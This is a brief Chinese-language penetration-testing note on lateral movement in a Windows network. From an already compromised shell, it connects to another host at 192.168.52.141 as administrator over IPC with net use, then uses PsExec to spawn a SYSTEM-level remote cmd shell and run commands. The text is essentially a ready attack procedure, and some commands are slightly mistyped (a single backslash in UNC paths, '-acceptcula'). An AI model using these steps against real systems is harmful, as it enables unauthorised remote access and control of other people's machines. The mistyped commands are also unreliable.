首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话
在已获得的shell中输入
net use \192.168.52.141 /user:administrator “密码”
(1)psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
psexec使用
建立IPC连接,无需输入密码
net use \192.168.52.141 /user:administrator “密码”
反弹cmd
psexec.exe \192.168.52.141 -s cmd.exe -acceptcula
执行命令
psexec.exe \192.168.52.141 whoami -acceptcula